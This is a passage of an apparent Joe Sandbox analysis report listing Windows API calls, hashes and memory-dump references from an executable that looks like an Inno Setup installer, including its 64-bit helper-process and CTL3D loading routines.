                                                                                  • Opcode Fuzzy Hash: 7b629e4230a16754486ed56ae920d883ae8ae6fbac6fb4db25cd6a5c7ea909d6
                                                                                  • Instruction Fuzzy Hash: 82D05BE270116017CB01BAED54C4AC657CC5B4925A71540B7F904EF257C678CD448398
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004678D0,00000000,00000000,00000000,0000000C,00000000), ref: 00466C00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                  • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                  • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                  • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0045163F,00000000), ref: 0042CD3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: bfa7c436ea4076489e3194c110aeffa5b63c2464b47e17bafb8d8bd18f179746
                                                                                  • Instruction ID: fe1bff9429d4e90dee18816d853216f65d631ba0a2a06ffe7669bbedc21dff1a
                                                                                  • Opcode Fuzzy Hash: bfa7c436ea4076489e3194c110aeffa5b63c2464b47e17bafb8d8bd18f179746
                                                                                  • Instruction Fuzzy Hash: 6FC08CE0322210169E20A6BD6CC951F06CC895837A3A40A77B03CEA2E2D23DD8162028
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6E4,0040CC90,?,00000000,?), ref: 00406EED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5ea83bba119d08381cf5149d3e870d091e521e5b09d6abf0e71c1523e48d3119
                                                                                  • Instruction ID: a78e408fffc15bc8d0ee8a54c686fbaa4e2694f5c3f88f37cecd524e454749ad
                                                                                  • Opcode Fuzzy Hash: 5ea83bba119d08381cf5149d3e870d091e521e5b09d6abf0e71c1523e48d3119
                                                                                  • Instruction Fuzzy Hash: ADC048B13C130032F93025A61C87F1604889714B1AE60943AB740BE1C2D8E9A818016C
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7
                                                                                    • Part of subcall function 00450728: GetLastError.KERNEL32(00450544,004507EA,?,00000000,?,00498504,00000001,00000000,00000002,00000000,00498665,?,?,00000005,00000000,00498699), ref: 0045072B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 734332943-0
                                                                                  • Opcode ID: ab92c804e13779e6a8a378971558b34dc584b681704b9a97c4630cfb3c940cd1
                                                                                  • Instruction ID: 0486764e065467a501855473afd0cd0cb10eaee8d6f94b4102cded937092f4df
                                                                                  • Opcode Fuzzy Hash: ab92c804e13779e6a8a378971558b34dc584b681704b9a97c4630cfb3c940cd1
                                                                                  • Instruction Fuzzy Hash: 0DC04CA9301201879F40A6AE85C190663DC9E1C3597504566B904CF20BD769DC044A14
                                                                                  APIs
                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,00498492,00000000,00498665,?,?,00000005,00000000,00498699,?,?,00000000), ref: 004072C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                  • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                  • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                  • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                  • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                  • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                  • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3375834691-0
                                                                                  • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                  • Instruction ID: 951f12253bcdbe2be33f1d7372765b1b3ebb510443260a24e1bbd496af9ec3c9
                                                                                  • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                  • Instruction Fuzzy Hash: AFA002755015409ADB10E7A5C84DF7A2298BF44204FD905FA714CA7052C53CD9008A55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 54e6278b00533fbd37ee9a008ccbf002b6a3644c608c9d01cb394214cb5b0466
                                                                                  • Instruction ID: 339ef80cccba5c7eac5873b70fc8c7721134c1cb18e48c6be9d277410f7c1673
                                                                                  • Opcode Fuzzy Hash: 54e6278b00533fbd37ee9a008ccbf002b6a3644c608c9d01cb394214cb5b0466
                                                                                  • Instruction Fuzzy Hash: 91518474E042499FEB01EFA9C882AAEBBF5EB49304F50407AE500A7351DB389D41CB99
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047E407,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047E3C1
                                                                                    • Part of subcall function 0042CA10: GetSystemMetrics.USER32(0000002A), ref: 0042CA22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMetricsMultiSystemWide
                                                                                  • String ID:
                                                                                  • API String ID: 224039744-0
                                                                                  • Opcode ID: 5d71ed7f78605e465d4fedccc20939528007dd55206323f19120b13c5f88598b
                                                                                  • Instruction ID: f91779ff8fcf2a57f01fce6343996b16dddddfd0a70f262f58e8d3032392e39f
                                                                                  • Opcode Fuzzy Hash: 5d71ed7f78605e465d4fedccc20939528007dd55206323f19120b13c5f88598b
                                                                                  • Instruction Fuzzy Hash: BC518870A00205AFD720DF9AD885B9A7BB8EB1C309F1181B7E804E73A1D7789D45CB59
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 2501c7b5f1b7e2a32cc088a261609a538437b101066d50b70fa7879060b37a7f
                                                                                  • Instruction ID: df12e3cc7205ed3866b0622d7fc8c89f1b444ce5416b62958542d3ca819b8d78
                                                                                  • Opcode Fuzzy Hash: 2501c7b5f1b7e2a32cc088a261609a538437b101066d50b70fa7879060b37a7f
                                                                                  • Instruction Fuzzy Hash: 5A1148742007069BCB10DF19C880B82FBE4EB98390B10D53BE9588B385D378E8558BA9
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,004530A1), ref: 00453083
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1452528299-0
                                                                                  • Opcode ID: 3dbc9b6b19259a40e1a8eccd310b33d8d478e911805451e546832dad24d45a24
                                                                                  • Instruction ID: 94e22d98a6c00f19aef873439ff0cfb4dcf68a684d4d060e49f788bb75b395da
                                                                                  • Opcode Fuzzy Hash: 3dbc9b6b19259a40e1a8eccd310b33d8d478e911805451e546832dad24d45a24
                                                                                  • Instruction Fuzzy Hash: 0701FC35604304AF8711DF69AC118EEBBE8DB8A76175042B7FC64D3382D6744E059764
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000011E0,000051E3,00401973), ref: 00401766
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: c2ec33a786a38e7bd0169ef8bddb7cde116ed653613200da8896670bb901eae8
                                                                                  • Instruction ID: be7f0be69d4b25e877c81db3c68dd302dbc4ff1700a0c49f545652be0e594e9c
                                                                                  • Opcode Fuzzy Hash: c2ec33a786a38e7bd0169ef8bddb7cde116ed653613200da8896670bb901eae8
                                                                                  • Instruction Fuzzy Hash: 1401FC766442148FC3109F29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 6d5f4615d296fbbc3d990cf813c80aa0ea5a8011e2983691863e8f068271b578
                                                                                  • Instruction ID: 6160d783662a008e1f799edb03f3d460fe671c60c73369e1be62f9e55b6485aa
                                                                                  • Opcode Fuzzy Hash: 6d5f4615d296fbbc3d990cf813c80aa0ea5a8011e2983691863e8f068271b578
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                  • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                  • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                  • API String ID: 2323315520-3614243559
                                                                                  • Opcode ID: 8697dd9d154f8e50884d4e158cb0ab166183fda0357b492364bfbc044a4492e6
                                                                                  • Instruction ID: cc035a32af1c864732f55fa5d96a8ee37849f8948b3bb020ccbabec4f333c5ef
                                                                                  • Opcode Fuzzy Hash: 8697dd9d154f8e50884d4e158cb0ab166183fda0357b492364bfbc044a4492e6
                                                                                  • Instruction Fuzzy Hash: 953142B1740600BBD701EBB5EC86A7A3394F768724B45093BB444EB192D77C4CA98F5D
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004586D7
                                                                                  • QueryPerformanceCounter.KERNEL32(02123858,00000000,0045896A,?,?,02123858,00000000,?,00459066,?,02123858,00000000), ref: 004586E0
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 004586EA
                                                                                  • GetCurrentProcessId.KERNEL32(?,02123858,00000000,0045896A,?,?,02123858,00000000,?,00459066,?,02123858,00000000), ref: 004586F3
                                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458769
                                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 00458777
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,0049AB24,00000003,00000000,00000000,00000000,00458926), ref: 004587BF
                                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458915,?,00000000,C0000000,00000000,0049AB24,00000003,00000000,00000000,00000000,00458926), ref: 004587F8
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004588A1
                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 004588D7
                                                                                  • CloseHandle.KERNEL32(000000FF,0045891C,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0045890F
                                                                                    • Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                  • API String ID: 770386003-3271284199
                                                                                  • Opcode ID: cae4615f4f3b0edee685ea835cc75ed235771dfd5f29473c0633b013cfbf874c
                                                                                  • Instruction ID: dce1d9d3a47b8e631bda5ef5291cfb12a825263051becb9b2fd33ba3793b7428
                                                                                  • Opcode Fuzzy Hash: cae4615f4f3b0edee685ea835cc75ed235771dfd5f29473c0633b013cfbf874c
                                                                                  • Instruction Fuzzy Hash: 2F710470A00248AEDB10DF65CC45B9E77F4EB05709F1044AAF944FB282DB785944CF6A
                                                                                  APIs
                                                                                    • Part of subcall function 004787AC: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787C5
                                                                                    • Part of subcall function 004787AC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004787CB
                                                                                    • Part of subcall function 004787AC: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787DE
                                                                                    • Part of subcall function 004787AC: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4), ref: 00478808
                                                                                    • Part of subcall function 004787AC: CloseHandle.KERNEL32(00000000,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 00478826
                                                                                    • Part of subcall function 00478884: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00478916,?,?,?,02122BD4,?,00478978,00000000,00478A8E,?,?,?,?), ref: 004788B4
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004789C8
                                                                                  • GetLastError.KERNEL32(00000000,00478A8E,?,?,?,?), ref: 004789D1
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478A1E
                                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478A42
